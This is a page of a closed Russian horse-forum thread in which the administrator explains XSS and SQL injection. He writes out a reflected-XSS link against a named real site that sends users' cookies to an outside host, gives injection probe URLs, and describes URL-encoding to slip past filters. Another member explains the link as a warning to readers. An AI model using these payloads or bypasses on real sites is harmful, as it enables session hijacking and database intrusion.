Карфаген

Форум закрыт! Новый адрес http://carfagen.flybb.ru/ !
Текущее время: 20-04, 11:57

Часовой пояс: UTC + 3 часа




Форум закрыт Эта тема закрыта, вы не можете редактировать и оставлять сообщения в ней.  [ Сообщений: 21 ]  На страницу Пред.  1, 2
Автор Сообщение
 Заголовок сообщения:
СообщениеДобавлено: 23-07, 14:43 
Не в сети
Главный Администратор
Аватара пользователя

Зарегистрирован: 18-07, 23:25
Сообщения: 460
Откуда: Ижевск.КСК Райтер
AndreyZ ъ
Вам написать с примерами, как воровать куки? :D
Они подумали, что я воспользовался xss-уязвимостью.
Собственно, это атака на пользователей сайта, используя его же уязвимость.
То есть, сервер не фильтрует обработку параметров. За счет чего, можно составить(в данном случае это пассивая xss) зловредную ссылку, перейдя через которую, можно получить куки пользователя, в том числе администратора.
Самое интересное, у спартанца нет абсолютно никаких понятии о знании сети и данного способа атак.
Я сначала выложил просто ссылку с вопросом - "что это такое?"
http://site.ru, а не как положено при атаке http://horseplanet.ru/index.php='><script>img=new Image();img.src="http://site.ru/index.js+document.cookie;"+document.cookie;</script>.
В первом случае, можно заходить хоть 100 раз. От этого горячо и холодно не будет.
Во втором случае, реально провести атаку.
Так вот, меня "якобы забанили" за первую ссылку :D
Если интересно, могу рассказать более подробно. :P


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 23-07, 15:55 
Не в сети

Зарегистрирован: 22-07, 03:27
Сообщения: 21
Спасибо, спросил чисто из любопытства.
Конечно прикольная засада с кавычкой...

Раз уж меня тут за перевод поблагодарили :) переведу на человеческий язык и это.

Смотрите на ссылку:

Код:
http://horseplanet.ru/index.php='><script>img=new Image();img.src="http://site.ru/index.js+document.cookie;"+document.cookie;</script>


Эксплорер думает, что он открывает сайт horseplanet.ru. Поэтому он разрешает этому сайту обращаться к своим кукам. Но эти куки должны стать именем файла картинки, якобы хранящейся на другом сайте (site.ru). И уже сам horseplanet.ru отправляет куки на site.ru, чтобы взять оттуда картинку с таким странным именем. Когда site.ru получает запрос на такую "картинку" он просто запоминает его. Сам запрос - это и есть сворованные куки.

Поучительный момент: если в ссылке видите кавычку:
Код:
index.php='

Значит это попытка заставить сервер, на который вы переходите, выполнить какие-то еще действия в надежде, что он отработает их чисто механически без проверки на допустимость. Обращайте на это внимание при работе.

P.S. Сетевую систему проектировал (правда, не web) - просто пронумеровал все допустимые запросы :) Чтоб никакой текстовой обработки не было.


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 23-07, 17:45 
Не в сети
Стригунок
Аватара пользователя

Зарегистрирован: 20-07, 00:29
Сообщения: 307
Супер!
Боглик, спасибо!


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 24-07, 19:12 
Не в сети
Главный Администратор
Аватара пользователя

Зарегистрирован: 18-07, 23:25
Сообщения: 460
Откуда: Ижевск.КСК Райтер
Поучительный момент: если в ссылке видите кавычку:
Код:
index.php='

Цитата:
Значит это попытка заставить сервер, на который вы переходите, выполнить какие-то еще действия в надежде, что он отработает их чисто механически без проверки на допустимость. Обращайте на это внимание при работе.


Насчет ковычки.
Если я вас правильно понял, сейчас вы описали не xss, а SQL Injection.
То есть, когда нет фильтрации спецсимволов в строке браузера.
Злоумышленник, обнаружив такую потенциально опасную уязвимость, пожет получить доступ к базе данных, а оттуда и ко всему сайту.
Код:
http://site.ru/index.php=2'
или
Код:
http://site.ru/index.php=-"2
в зависимости от фильтрации.
От таких атак самый лучший способ это фильтровать спецсимволы..Но эту проблему легко обойти воспользовашись другими символами %00 - нулевым байтом, который отбрасывает расширение..(ой, это уже php-including))
То есть, если система блокирует ввод данных типа
Код:
http://site/index.php=-'2
, то можно провести кодирование. И строка уже получается такая:
Код:
%68%74%74%70%3A%2F%2F%73%69%74%65%2F%69%6E%64%65%78%2E%70%68%70%3D%2D%27%32

Согласитесь, система ничего не заподозрит.
Если Вы имели xss уязвимость...думаю, при обращении строки, она
Код:
http://horseplanet.ru/trye.asp?sessionID=[code]">[/code]<IMG%20SRC="javascript:alert();

Сайт закрывает скобку, и думает, что операция завершена, когда дальше идет выполнение скрипта, то есть он ее не замечает.


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 02-08, 00:46 
Не в сети
Спортивная лошадь
Аватара пользователя

Зарегистрирован: 23-07, 21:23
Сообщения: 1400
Откуда: Москва
Не, ну чё за низкие люди? они на большее не способны чтоль?.. Или им приятней от этого? Садисты блин, а ещё животных пытаются защищать, фу...

_________________
Нет дискриминации - я ненавижу всех! ну... кроме Спартанца, конечно же!


Последний раз редактировалось alka_prim 03-08, 21:22, всего редактировалось 1 раз.

Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 03-08, 12:21 
Не в сети
Стригунок
Аватара пользователя

Зарегистрирован: 02-08, 15:39
Сообщения: 114
Откуда: от верблюда
Moderator correction
Such offers send, please, to private


Вернуться к началу
 Профиль  
 
Показать сообщения за:  Поле сортировки  
Форум закрыт Эта тема закрыта, вы не можете редактировать и оставлять сообщения в ней.  [ Сообщений: 21 ]  На страницу Пред.  1, 2

Часовой пояс: UTC + 3 часа


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 0


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения

Найти:
Перейти:  
cron
Powered by Forumenko © 2006–2014
Русская поддержка phpBB